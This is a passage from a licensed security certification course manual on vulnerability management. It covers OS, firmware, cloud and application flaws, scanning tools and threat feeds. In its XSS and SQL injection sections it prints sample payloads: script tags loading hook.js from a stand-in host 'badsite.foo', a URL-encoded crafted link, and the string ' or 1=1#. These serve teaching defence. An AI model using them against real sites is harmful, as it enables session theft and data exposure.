and locks (physical, electronic, and biometric). If using smart cards, use a type
that is resistant to cloning/skimming.
• Monitor the site using security guards, CCTV, and drones/UAV, and use effective
lighting to maximize surveillance.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LESSON INTRODUCTION
Vulnerability management is critical to any organization’s cybersecurity strategy,
encompassing identifying, evaluating, treating, and reporting security vulnerabilities
in operating systems, applications, and other components of an organization’s IT
operations. Vulnerability management may involve patching outdated systems,
hardening configurations, or upgrading to more secure versions of operating
systems. For applications, it might include code reviews, security testing, and
updating third-party libraries.
Vulnerability scanning is a crucial component of this process, with specialized
tools utilized to identify potential weaknesses in an organization’s digital assets
automatically. These tools scan for known vulnerabilities such as open ports,
insecure software configurations, or outdated versions. Post scanning, analysis
is performed to validate, classify, and prioritize the identified vulnerabilities for
remediation based on factors such as the potential impact of a breach, the ease of
exploiting the vulnerability, and the importance of the asset at risk. This continuous
cycle of assessment and improvement helps organizations maintain safe and
secure computing environments.
Lesson Objectives
In this lesson, you will do the following:
• Describe the importance of vulnerability management.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 8A
Device and OS Vulnerabilities
2
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The widespread adoption of Mobile OS like Android and iOS and their increasing
use as primary computing platforms instead of traditional computers make them
valuable targets for attack and exploitation. Android is open source, like Linux,
resulting in similar benefits and problems. Additionally, Android OS is fragmented
among different manufacturers and versions, resulting in inconsistent patching and
updates support. iOS, while not open source like Android, has also been impacted
by several significant vulnerabilities.
The significance of OS vulnerabilities cannot be overstated, especially as specialized
embedded systems, such as IoT, are added to our surroundings. Each system runs
specialty operating systems and introduces vulnerabilities and potential pathways
into corporate infrastructures.
Example OS Vulnerabilities
• Microsoft Windows—One of the most notorious vulnerabilities in Windows
history was the MS08-067 vulnerability in Windows Server Service. This
vulnerability allowed remote code execution if a specially crafted packet was sent
to a Windows server. This vulnerability was exploited by the Conficker worm in
2008, which infected millions of computers worldwide. Additionally, MS17-010
represents a significant and critical security update released by Microsoft in March
2017. This update addressed multiple vulnerabilities in Microsoft’s implementation
of the Server Message Block (SMB) protocol (a network file-sharing protocol)
that could allow remote code execution (RCE). Essentially, these vulnerabilities, if
exploited, could allow an attacker to install programs; view, change, or delete data;
or create new accounts with full user rights.
The significance of MS17-010 is tied closely to the EternalBlue exploit, which leveraged
the vulnerabilities in early versions of the SMB protocol for malicious purposes. The
most famous misuse of EternalBlue was during the WannaCry ransomware attack
in May 2017, where it was used to propagate the ransomware across networks
worldwide, leading to massive damage and disruption. This event underlined the critical
importance of timely system patching and reinforced the potential global impact of
such vulnerabilities.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Vulnerability Types
Legacy and End-of-Life (EOL) Systems
Hardware vulnerabilities, particularly those associated with end-of-life and legacy
systems, present considerable security challenges for many organizations, as
patches or fixes for vulnerabilities are either unavailable or difficult to apply.
End-of-life (EOL) and legacy systems share a common characteristic: they are
both outdated. EOL systems may be legacy systems, and some legacy systems
are also EOL.
The manufacturer or vendor no longer supports EOL systems, so they do not
receive updates, including critical security patches. This makes them vulnerable to
newly discovered threats. Conversely, while still outdated, the vendor may still fully
support legacy systems.
An EOL system is a specific product or version of a product that the manufacturer
or vendor has publicly declared as no longer supported. It is also possible for
open-source projects to be abandoned by the maintainers. An EOL system can
be a hardware device, a software application, or an operating system. Products
should be replaced or updated before they reach EOL status to ensure they remain
supported by their vendors and receive critical security patches. Notable EOL
product examples include the Windows 7 and Server 2008 operating systems, which
stopped receiving updates in January 2020. These systems are significantly more
vulnerable to attacks due to the absence of security patches for new vulnerabilities.
Despite their EOL status, they are still in use in many environments.
Many devices (peripheral devices especially) remain on sale with known severe
vulnerabilities in firmware or drivers and no possibility of vendor support to
remediate them, especially in secondhand, recertified, or renewed/reconditioned
marketplaces. Examples include recertified computer equipment, consumer-grade
and recertified networking equipment, and various Internet of Things devices.
Legacy systems typically describe outdated software methods, technology,
computer systems, or application programs that continue to be used despite their
shortcomings. Legacy systems often remain in use for extended periods because
the organization’s leadership recognizes that replacing or redesigning them will
be expensive or pose significant operational risks stemming from complexity. The
term “legacy” does not necessarily mean that the vendor no longer supports the
system but rather that it represents hardware and software methods that are
no longer popular and often incompatible with newer architectures or methods.
Legacy systems often remain in use because they operate with sufficient reliability,
have been incorporated into many critical business functions, and are familiar to
long-tenured staff.
Assessing the risks associated with using EOL and legacy products, such as lack of
updates, lack of support, and compatibility issues with newer systems, is crucial.
EOL and legacy product replacements must continue to meet the organization’s
requirements, maintain compatibility with existing infrastructure, and support
reliable data migration. Selection criteria must consider the availability of vendor
support, device warranty details, and marketplace performance/reputation.
Transitioning costs must be carefully assessed, too, including licensing, hardware
upgrades, and professional service implementation fees. The work to transition
away from EOL and legacy products must minimize disruptions and ensure long-
term sustainability.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Firmware Vulnerabilities
Firmware is the foundational software that controls hardware and can contain
significant vulnerabilities. For instance, the Meltdown and Spectre vulnerabilities
identified in 2018 impacted almost all computers and mobile devices. The
vulnerability was associated with the processors used inside the computer and
allowed malicious programs to steal data as it was being processed. Another
vulnerability, “LoJax,” discovered in the Unified Extensible Firmware Interface
(UEFI) firmware in 2018, enabled an attacker to persist on a system even after a
complete hard drive replacement or OS reinstallation. End-of-life (EOL) hardware
vulnerabilities arise when manufacturers cease providing product updates, parts, or
patches to the firmware.
Virtualization Vulnerabilities
While offering numerous benefits such as cost savings, scalability, and efficiency,
virtualization also introduces unique vulnerabilities. A significant one is the concept
of VM escape. This happens when an attacker with access to a virtual machine
breaks out of this isolated environment and gains access to the host system or
other VMs running on the same host. Such a vulnerability could allow an attacker to
gain control of all virtual machines running on a single physical server, leading to a
potentially devastating security breach.
A famous example is the “Cloudburst” vulnerability in VMware’s virtual machine
display function. The Cloudburst vulnerability, officially designated as CVE-2009-
1244, was a critical security flaw discovered in 2009 in VMware’s ESX Server,
a popular enterprise-level virtualization platform. A vulnerability in the virtual
machine display function allowed a guest operating system to execute code on the
host operating system.
Another significant vulnerability associated with virtualization involves resource
reuse. Virtual machines are frequently created, used, and then deleted in a
virtualized environment. If the resources, such as disk space or memory, are not
properly sanitized between each use, sensitive data could be leaked between virtual
machines. For instance, a new virtual machine may be allocated disk space that was
previously used by another VM, and if this disk space is not properly wiped, the new
VM could recover sensitive data from the previous VM.
Thorough data sanitization practices, ensuring data encryption throughout the
lifecycle, and implementing robust encryption key management practices mitigate
the risk of resource reuse in cloud infrastructure. Training on cloud provider
security features and best practices and segregating resources based on security
levels also mitigates risks.
Virtualization platforms depend upon specialized hypervisors that contain security
vulnerabilities and weaknesses. Attackers exploit hypervisors to gain unauthorized
access and compromise the virtual machines (VMs) running on them. Hypervisors
typically provide specialized management interfaces so administrators can control
and monitor their virtualized environments. These interfaces can become potential
attack vectors if insecure. For example, weak authentication, lack of encryption, or
vulnerabilities in communication protocols can lead to unauthorized access to the
virtualized environment. Like any software, hypervisors have vulnerabilities that
must be regularly patched.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Zero-Day Vulnerabilities
Zero-day vulnerabilities refer to previously unknown software or hardware flaws
that attackers can exploit before developers or vendors become aware of or have
a chance to fix them. The term “zero-day” signifies that developers have “zero days”
to fix the problem once the vulnerability becomes known. These vulnerabilities are
significant because they can cause widespread damage before a patch is available.
An attacker exploiting a zero-day vulnerability can compromise systems, steal
sensitive data, launch further attacks, or cause other forms of harm, often
undetected. The stealth and unpredictability of zero-day attacks make them
particularly dangerous. They are a favored tool of advanced threat actors, such as
organized crime groups and nation-state attackers, who often use them in targeted
attacks against high-value targets, such as governmental institutions and major
corporations.
Since these vulnerabilities are unknown to the public or the vendor during
exploitation, traditional security measures like antivirus software and firewalls,
which rely on known signatures or attack patterns, are often ineffective against
them. The discovery of a zero-day vulnerability typically triggers a race between
threat actors, who aim to exploit it, and developers, who work to patch it. Upon
discovering a zero-day vulnerability, ethical security researchers usually follow a
process known as responsible disclosure, which is designed to privately inform the
vendor so a patch can be developed before the vulnerability is publicly disclosed.
This practice aims to limit the potential harm caused by discovering a zero-day
vulnerability.
The term “zero-day” is usually applied to the vulnerability itself but can also refer to an
attack or malware that exploits it.
Misconfiguration Vulnerabilities
Misconfiguration of systems, networks, or applications is a common cause of
security vulnerabilities. These can lead to unauthorized access, data leaks, or
even full-system compromises. These can occur across many areas within an IT
environment, from network equipment and servers to databases and applications.
In a cloud environment, misconfigurations, such as improperly managed access
permissions on storage buckets, can lead to significant data leaks.
Default configurations of systems, applications, or devices are often designed
to prioritize ease of use, setup simplicity, and broad compatibility. However, this
often results in a security trade-off, making these defaults a common source of
vulnerability. For instance, default configurations may enable unnecessary services
that open potential attack vectors or include easily guessable default credentials,
such as ‘admin’ for both username and password. Some systems may have overly
permissive configurations that heavily focus on usability and potentially expose
sensitive information if left unmodified. Network devices like routers and switches
often have default configurations that compromise security, such as well-
documented default credentials and the use of vulnerable management protocols.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Similarly, cloud services often have default settings that leave data storage
or compute instances publicly accessible. Administrators and engineers must
carefully configure systems, devices, and applications according to the principle of
least privilege and published best practices. This includes changing default login
credentials, tightening access controls, and regularly auditing configurations to
ensure ongoing security, as a minimum.
Providing support to resolve functional issues in an IT environment is an essential
part of maintaining business operations, but it can also inadvertently lead to
misconfigurations and vulnerabilities. For example, while troubleshooting an issue,
a support technician may temporarily disable security features or loosen access
controls to help isolate a problem. If these changes are not reverted after the
issue is resolved, they may leave the system vulnerable. Similarly, installing new
software or modifying existing software configurations can introduce unexpected
vulnerabilities or leave the system less secure. Remote support tools can also
pose a risk if not adequately secured, and an attacker could exploit these tools to
gain access to a system or network. When addressing urgent issues and outages,
especially high-impact ones, best practices for change management are often
bypassed. Changes are made without proper documentation, testing, or approval,
leading to misconfigurations or system instability.
Cryptographic Vulnerabilities
Cryptographic vulnerabilities refer to weaknesses in cryptographic systems,
protocols, or algorithms that can be exploited to compromise data. The significance
of such vulnerabilities is profound, as cryptography forms the backbone of
secure communication and data protection in modern digital systems. Moreover,
weaknesses in cryptographic algorithms themselves can also pose a threat. For
instance, MD5 and SHA-1, once widely used cryptographic hash functions, are now
considered insecure due to vulnerabilities that allow for collision attacks, where two
different inputs produce the same hash output, which is particularly troubling in
scenarios where hashes are used to protect passwords.
Practical examples of cryptographic vulnerabilities include the Heartbleed
vulnerability, which exploited a flaw in the OpenSSL cryptographic library, allowing
attackers to read otherwise secure communication. Another example is the KRACK
(Key Reinstallation Attacks) vulnerability in the WPA2 protocol that protects Wi-Fi
traffic. This vulnerability allows an attacker within range of a victim to intercept and
decrypt some types of sensitive network traffic.
Symmetric and asymmetric encryption algorithms and cipher suites can also have
vulnerabilities that lead to potential security issues. One of the most significant
vulnerabilities in symmetric encryption algorithms is the use of weak keys. The
Data Encryption Standard (DES) algorithm, once a popular symmetric encryption
standard, was found to be vulnerable to brute force attacks due to its 56-bit key
size. The DES, developed in the early 1970s, was first publicly demonstrated to be
vulnerable to brute force attacks in the late 1990s. This led to its replacement by
more secure standards such as Triple DES and eventually the Advanced Encryption
Standard (AES). Triple DES (3DES), which applies the DES algorithm three times
to protect data, was considered significantly more secure than DES when it was
initially introduced.
However, with the continued advancement of computational power and the
discovery of additional attack methods, 3DES vulnerabilities have been found, most
notably the “Sweet32” birthday attack (CVE-2016-2183) published in August 2016.
The US National Institute of Standards and Technology (NIST) officially deprecated
3DES in 2017 and recommended its discontinuation by 2023.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Some asymmetric encryption algorithms also have vulnerabilities. For instance, RSA,
a widely used public key cryptosystem, can be vulnerable if small key sizes are used
or if the random number generation for creating the keys is weak. Also, if the same
key pair is used for an extended period in an asymmetric scheme, the likelihood of
the key being compromised increases.
Cipher suites, which describe combinations of encryption algorithms used in protocols
like SSL/TLS, can also have vulnerabilities. SSL/TLS is commonly used to secure web
browser sessions, encrypting communication between a browser and a web server
and essentially turning an “http” web address into a secure “https” address. SSL/TLS is
also used for secure email transmission (SMTP, POP, and IMAP protocols), secure voice
over IP (VoIP) calls, and secure file transfers (FTP). In all these cases, SSL/TLS helps
protect sensitive data from being intercepted and read by unauthorized parties. Other
networked applications and services also use SSL/TLS, including VPN connections, chat
applications, and mobile apps that transmit sensitive data.
Prominent examples of attacks against cipher suite vulnerabilities include the BEAST
(Browser Exploit Against SSL/TLS) and POODLE (Padding Oracle On Downgraded
Legacy Encryption) attacks that target weaknesses in the cipher suites used by SSL
and early versions of TLS. Both attacks exploited similar implementation flaws.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Rooting, sideloading, and jailbreaking offer users greater control and flexibility
over their devices, but they also introduce many risks for organizations. Rooting,
sideloading, and jailbreaking can weaken the security measures implemented by
the device manufacturer and operating system and make it easier for attackers
to exploit vulnerabilities, install malware, or gain unauthorized access to sensitive
corporate information. By enabling access to unverified app stores or installing
apps from unofficial sources, there is an increased risk of downloading malicious or
compromised applications.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Device and OS Vulnerabilities
3
The PC runs process management software that the owner cannot run
on Windows 11. What are the risks arising from this, and how can they be
mitigated?
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 8B
Application and Cloud Vulnerabilities
4
Application Vulnerabilities
Race Condition and TOCTOU
Application race condition vulnerabilities refer to software flaws associated with
the timing or order of events within a software program, which can be manipulated,
causing undesirable or unpredictable outcomes. A race condition describes when
two or more operations must execute in the correct order. When software logic
does not check or enforce the expected order of events, security issues such as
data corruption, unauthorized access, or similar security breaches may occur. Race
conditions manifest in a wide variety of ways, such as time-of-check to time-of-
use (TOCTOU) vulnerabilities, where a system state changes between the check
(verification) stage and the use (execution) stage.
Imagine a scenario where a multi-threaded banking application used one program
thread to check an account balance and another thread to withdraw money. If
an attacker manipulates the sequence of execution in this example, they could
potentially overdraw the account. These vulnerabilities underscore the importance
of atomic operations where checking and execution are done as a single, indivisible
operation, mitigating the likelihood of exploitation.
Two significant examples of race conditions include the Dirty COW Vulnerability
(CVE-2016-5195), which is a race condition vulnerability in the Linux Kernel, allowing
a local user to gain privileged access, and the Microsoft Windows Elevation of
Privilege Vulnerability (CVE-2020-0796), which is a race condition vulnerability
associated with the Microsoft Server Message Block 3.1.1 (SMBv3) protocol allowing
an attacker to execute arbitrary code on a target SMB server or client. Race
conditions are often mitigated by developers through the use of locks, semaphores,
and monitors in multi-threaded applications.
Lesson 8 : Explain Vulnerability Management | Topic 8B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Memory Injection
Memory injection vulnerabilities refer to a type of security flaw where an attacker
can introduce (inject) malicious code into a running application’s process memory.
An attacker often designs the injected code to alter an application’s behavior to
provide unauthorized access or control over the system. Injection vulnerabilities
are significant because they often lead to severe security breaches. Attackers often
use memory injection vulnerabilities to inject code that installs malware, exfiltrates
sensitive data, or creates a backdoor for future access. Injected code generally
runs with the same level of privileges as the compromised application, which
can lead to a full system compromise if the exploited application has high-level
permissions. Common memory injection attacks include buffer overflow attacks,
format string vulnerabilities, and code injection attacks. These types of attacks are
typically mitigated with secure coding practices such as input and output validation,
encoding, type-casting, access controls, static and dynamic application testing, and
several other techniques.
Buffer Overflow
A buffer is an area of memory that the application reserves to store expected
data. To exploit a buffer overflow vulnerability, the attacker passes data that
deliberately overfills the buffer. One of the most common vulnerabilities is a stack
overflow. The stack is an area of memory used by a program subroutine. It includes
a return address, which is the location of the program that called the subroutine.
An attacker could use a buffer overflow to change the return address, allowing the
attacker to run arbitrary code on the system.
Buffer overflow attacks are mitigated on modern hardware and operating systems
via address space layout randomization (ASLR) and Data Execution Prevention
(DEP) controls, utilizing type-safe programming languages and incorporating
secure coding practices.
When executed normally, a function will return control to the calling function. If the code is
vulnerable, an attacker can pass malicious data to the function, overflow the stack, and run
arbitrary code to gain a shell on the target system.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Malicious Update
A malicious update refers to an update that appears legitimate but contains
harmful code, often used by cybercriminals to distribute malware or execute a
cyberattack. The update may claim to fix software bugs or offer new features but is
instead designed to compromise a system. The significance of such attacks lies in
their deceptive nature; users trust and frequently accept software updates, making
malicious updates a highly effective infiltration strategy. Malicious updates can be
difficult to protect against, but secure software supply chain management, digital
signature verification, and other software security practices help mitigate these risks.
In 2017, the legitimate software CCleaner was compromised when an unauthorized
update was released containing a malicious payload. This affected millions of users
who downloaded the update, believing it was a standard upgrade to improve their
system’s performance. https://arstechnica.com/information-technology/2017/09/
backdoor-malware-planted-in-legitimate-software-updates-to-ccleaner/
Another notable case is the 2020 SolarWinds attack, where an update to the
SolarWinds Orion platform was used to distribute a malicious backdoor to
numerous government and corporate networks, leading to significant data
breaches. https://www.npr.org/2021/04/16/985439655/a-worst-nightmare-
cyberattack-the-untold-story-of-the-solarwinds-hack
Evaluation Scope
Evaluation target or scope refers to the product, system, or service being analyzed
for potential security vulnerabilities. This could be a software application, a
network, a security service, or even an entire IT infrastructure. The target is the
focus of a specific evaluation process, where it is subjected to rigorous testing
and analysis to identify any possible weaknesses or vulnerabilities in its design,
implementation, or operation. For application vulnerabilities, the target would refer
to a specific software application. Security analysts assess application code, logic,
data handling, authentication mechanisms, and many other aspects relevant to its
security. Identified vulnerabilities often range from common ones, such as injection
flaws, broken authentication, and sensitive data exposure, to more obscure ones
related to the application's unique features or purpose. The primary goal of the
evaluation is to mitigate risk, improve the application's security posture, and ensure
compliance with relevant security standards or regulations.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
HTTP is stateless, meaning each request is independent, and the server does not
retain information about the client’s state. Web applications must manage sessions
and maintain state using mechanisms such as cookies or session IDs. Improper
session management, such as predictable session IDs, session fixation, or session
hijacking, are associated with many types of web application attacks, such as
cross-site request forgery (CSRF) and cross-site scripting (XSS). These attacks exploit
the web’s inherent trust in requests or scripts that appear to come from valid users
or trusted sites.
2. The attacker crafts a URL to perform a code injection against the trusted site.
This could be coded in a link from the attacker’s site to the trusted site or a
link in an email message.
3. When the user clicks the link, the trusted site returns a page containing
the malicious code injected by the attacker. As the browser is likely to be
configured to allow the site to run scripts, the malicious code will execute.
The malicious code could be used to deface the trusted site (by adding any
sort of arbitrary HTML code), steal data from the user’s cookies, try to intercept
information entered into a form, perform a request forgery attack, or try to install
malware. The crucial point is that the malicious code runs in the client’s browser
with the same permission level as the trusted site.
An attack where the malicious input comes from a crafted link is a reflected or
nonpersistent XSS attack. A stored/persistent XSS attack aims to insert code into a
back-end database or content management system used by the trusted site. For
example, the attacker may submit a post to a bulletin board with a malicious script
embedded in the message. When other users view the message, the malicious
script is executed. For example, with no input sanitization, a threat actor could type
the following into a new post text field:
Check out this amazing <a href="https://trusted.
foo">website</a><script src="https://badsite.foo/
hook.js"></script>.
Users viewing the post will have the malicious script hook.js execute in their
browser.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
A third type of XSS attack exploits vulnerabilities in client-side scripts. Such scripts
often use the Document Object Model (DOM) to modify the content and layout
of a web page. For example, the “document.write” method enables a page to take
some user input and modify the page accordingly. An exploit against a client-side
script could work as follows:
1. The attacker identifies an input validation vulnerability in the trusted site. For
example, a message board might take the user’s name from an input text box
and show it in a header.
https://trusted.foo/messages?user=james
2. The attacker crafts a URL to modify the parameters of a script that the server
2.
https://trusted.foo/messages?
user=James%3Cscript%20src%3D%22https%3A%2F%
2Fbadsite.foo%2Fhook.js%22%3E%3C%2Fscript%3E
3. The server returns a page with the legitimate DOM script embedded, but
3.
James<script src="https://badsite.foo/hook.
js"></script>
4. The browser renders the page using the DOM script, adding the text “James”
4.
to the header, but also executing the hook.js script at the same time.
DOM-based cross-site scripting (XSS) occurs when a web application's client-side script
manipulates the Document Object Model (DOM) of a webpage. Unlike other forms of
XSS attacks that exploit server-side vulnerabilities, DOM-based XSS attacks target the
client-side environment, allowing an attacker to inject malicious script code executed
within the user's browser within the context of the targeted webpage.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
For example, consider a web form that is supposed to take a name as input. If the
user enters "Bob,” the application runs the following query:
SELECT * FROM tbl_user WHERE username = 'Bob'
If a threat actor enters the string ' or 1=1# and this input is not sanitized, the
following malicious query will be executed:
SELECT * FROM tbl_user WHERE username = '' or 1=1#
The logical statement 1=1 is always true, and the # character turns the rest of the
statement into a comment, making it more likely that the web application will parse
this modified version and dump a list of all users.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Reverse proxy—this is positioned at the cloud network edge and directs traffic
to cloud services if the contents of that traffic comply with policy. This does not
require configuration of the users’ devices. This approach is only possible if the
cloud application has proxy support.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Supply Chain
Software supply chain vulnerabilities refer to the potential risks and weaknesses
introduced into software products during their development, distribution, and
maintenance lifecycle. This supply chain describes many stages, from initial
coding to end-user deployment, and includes various service providers, hardware
providers, and software providers.
Service Providers
Service providers, such as cloud services or third-party development agencies,
play a role in the software supply chain by offering development, testing, and
deployment platforms or directly contributing to the software’s codebase.
Vulnerabilities can be introduced if these services have inadequate security
measures or if the communication between these services and the rest of the
supply chain is not secured correctly.
Hardware Suppliers
Hardware suppliers play a crucial role in the software supply chain and can be
potential sources of vulnerabilities. The hardware on which software runs or
interacts with forms the base of the technology stack. If this hardware layer is
compromised, it can lead to severe security issues. This is particularly true for
firmware or low-level software drivers interacting closely with the hardware. If
a hardware supplier fails to apply robust security practices in their design and
manufacturing processes, vulnerabilities can be introduced that compromise the
entire system.
For example, a hardware component could come with preinstalled firmware that
contains a known vulnerability, or it might be susceptible to physical tampering
that leads to a breach in security. Similarly, hardware devices often require
specific drivers to function correctly. If these drivers are not updated regularly or
are sourced from unreliable providers, they can introduce vulnerabilities into the
software stack.
Furthermore, hardware suppliers often provide the entire software stack running
on the device for IoT and embedded systems, making them a significant factor in
a system’s overall security. Therefore, it’s crucial for software supply chain security
to ensure that hardware suppliers adhere to stringent security standards and that
hardware components and associated low-level software are regularly updated and
patched to address any potential vulnerabilities.
Software Providers
Software providers, including makers of libraries, frameworks, and other third-party
components used in the software, are a common source of vulnerabilities. If third-
party components have vulnerabilities or are outdated, they can expose the entire
application to potential attacks. In all these relationships, trust is implicitly placed in
each provider to maintain high security. If any link in this chain fails to meet these
expectations, it can lead to software supply chain vulnerabilities.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
An SBOM aims to provide transparency and visibility into the software supply chain,
which can significantly help mitigate software supply chain issues. By detailing all
components used in a software product, an SBOM enables developers, security
teams, and end users to understand the functional components of their software.
This visibility aids in identifying potential vulnerabilities in third-party components,
allowing them to be patched or replaced before issues materialize. It also helps
track software components’ origin, ensuring they come from trusted sources.
After a vulnerability disclosure or a security incident, an SBOM supports rapid
response and remediation. Security teams can quickly determine whether their
software is affected by a disclosed vulnerability in a particular component and take
appropriate action.
An SBOM is a critical tool for managing and securing the software supply chain
because it contributes to a more proactive and informed approach to identifying
and managing potential software supply chain issues.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Application and Cloud Vulnerabilities
5
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 8C
Vulnerability Identification Methods
4
Vulnerability Scanning
Vulnerability management is a cornerstone of modern cybersecurity practices
aimed at identifying, classifying, remediating, and mitigating vulnerabilities within a
system or network. One crucial aspect of vulnerability management is vulnerability
scanning, a systematic process of probing a system or network using specialized
software tools to detect security weaknesses. Vulnerability scans are performed
internally and externally to inventory vulnerabilities from different network
viewpoints. Vulnerabilities identified during scanning are then classified and
prioritized for remediation by security operations teams.
Vulnerability scanning also supports application security, as it helps to locate and
identify misconfigurations and missing patches in software. Advanced vulnerability
scanning techniques focused on application security include specialized application
scanners, pen-testing frameworks, and static and dynamic code testing.
Vulnerability scanning tools like openVAS and Nessus are popular tools offering
a broad range of features designed to analyze network equipment, operating
systems, databases, patch compliance, configuration, and many other systems.
While these tools are very effective, application security analysis warrants much
more specialized approaches. Several specialized tools exist to more deeply analyze
how applications are designed to operate and can locate vulnerabilities not typically
identified using generalized scanning approaches.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Greenbone OpenVAS vulnerability scanner with Security Assistant web application interface
as installed on Kali Linux. (Screenshot used with permission from Greenbone Networks,
http://www.openvas.org.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
device management interfaces, but they are not given privileged access. While you
may discover more weaknesses with a credentialed scan, you sometimes will want
to narrow your focus to think like an attacker who doesn’t have specific high-level
permissions or total administrative access. Non-credentialed scanning is often the
most appropriate technique for external assessment of the network perimeter or
when performing web application scanning.
A credentialed scan is given a user account with login rights to various hosts, plus
whatever other permissions are appropriate for the testing routines. This sort of
test allows much more in-depth analysis, especially in detecting when applications
or security settings may be misconfigured. It also shows what an insider attack, or
one where the attacker has compromised a user account, may be able to achieve. A
credentialed scan is a more intrusive type of scan than non-credentialed scanning.
Configuring credentials for use in target (scope) definitions in Greenbone OpenVAS as installed on
Kali Linux. (Screenshot used with permission from Greenbone Networks, http://www.openvas.org.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Package Monitoring
Another important capability in application vulnerability assessment practices
includes package monitoring. Package monitoring is associated with vulnerability
identification because it tracks and assesses the security of third-party software
packages, libraries, and dependencies used within an organization to ensure that
they are up to date and free from known vulnerabilities that malicious actors could
exploit. Package monitoring is associated with the management of software bill of
materials (SBOM) and software supply chain risk management practices.
In an enterprise setting, package monitoring is typically achieved through
automated tools and governance policies. Automated software composition
analysis (SCA) tools track and monitor the software packages, libraries, and
dependencies used in an organization’s codebase. These tools can automatically
identify outdated packages or those with known vulnerabilities and suggest updates
or replacements. They work by continuously comparing the organization’s software
inventory against various databases of known vulnerabilities, such as the National
Vulnerability Database (NVD) or vendor-specific advisories.
In addition to these tools, organizations often implement governance policies
around software usage. These policies may require regular audits of software
packages, approval processes for adding new packages or libraries, and procedures
for updating or patching software when vulnerabilities are identified.
Threat Feeds
Another important element of vulnerability management is the use of threat feeds.
These are real-time, continuously updated sources of information about potential
threats and vulnerabilities, often gathered from multiple sources. By integrating
threat feeds into their vulnerability management practices, organizations can stay
aware of the latest risks and respond more swiftly.
Threat feeds are pivotal in vulnerability scanning by providing real-time, continuous
data about the latest vulnerabilities, exploits, and threat actors. These feeds serve
as a valuable resource for enhancing the organization’s threat intelligence and
enabling quicker identification and remediation of potential vulnerabilities. They
integrate data from various sources, including security vendors, cybersecurity
organizations, and open-source intelligence, to comprehensively view the threat
landscape.
Common threat feed platforms include AlienVault’s Open Threat Exchange
(OTX), IBM’s X-Force Exchange, and Recorded Future. These platforms gather,
analyze, and distribute information about new and emerging threats, providing
actionable intelligence that can be incorporated into an organization’s vulnerability
management practices and sometimes directly into security infrastructure tools to
provide up-to-the-minute protections.
Threat feeds significantly improve vulnerability identification by providing timely
information and context about new threats that traditional vulnerability scanning
does not provide. Threat feeds provide information that helps organizations
focus their remediation efforts on the most relevant and potentially damaging
vulnerabilities first. This proactive approach can significantly reduce the time
between discovering a vulnerability and its remediation, thus minimizing the
organization’s exposure to potential attacks.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
IBM X-Force Exchange threat intelligence portal. (Image copyright 2019 IBM Security
exchange.xforce.ibmcloud.com.)
The outputs from the primary research undertaken by threat data feed providers
and academics can take three main forms:
• Behavioral Threat Research—narrative commentary describing examples of
attacks and TTPs gathered through primary research sources.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Threat data can be packaged as feeds that integrate with a security information
and event management (SIEM) platform. These feeds are usually described as
cyber threat intelligence (CTI) data. The data on its own is not a complete security
solution. To produce actionable intelligence, the threat data must be correlated with
observed data from customer networks. This type of analysis is often powered by
artificial intelligence (AI) features of the SIEM.
Threat intelligence platforms and feeds are supplied as one of three different
commercial models:
• Closed/proprietary—the threat research and CTI data is made available as
a paid subscription to a commercial threat intelligence platform. The security
solution provider will also make the most valuable research available early to
platform subscribers in the form of blogs, white papers, and webinars. Some
examples of such platforms include the following:
Information-Sharing Organizations
Threat feed information-sharing organizations are collaborative groups that
exchange data about emerging cybersecurity threats and vulnerabilities. These
organizations collect, analyze, and disseminate threat intelligence from various
sources, including their members, security researchers, and public sources.
Members of these organizations, often composed of businesses, government
entities, and academic institutions, can benefit from the shared intelligence by
gaining insights into the latest threats they might not have access to individually.
They can use this information to fortify their systems and respond swiftly to
emerging threats. Examples of such organizations include the Cyber Threat Alliance
and the Information Sharing and Analysis Centers (ISACs) which span various
industries. These organizations are crucial in enhancing collective cybersecurity
resilience and promoting a collaborative approach to tackling cyber threats.
Open-Source Intelligence
Open-source intelligence (OSINT) describes collecting and analyzing publicly
available information and using it to support decision-making. In cybersecurity
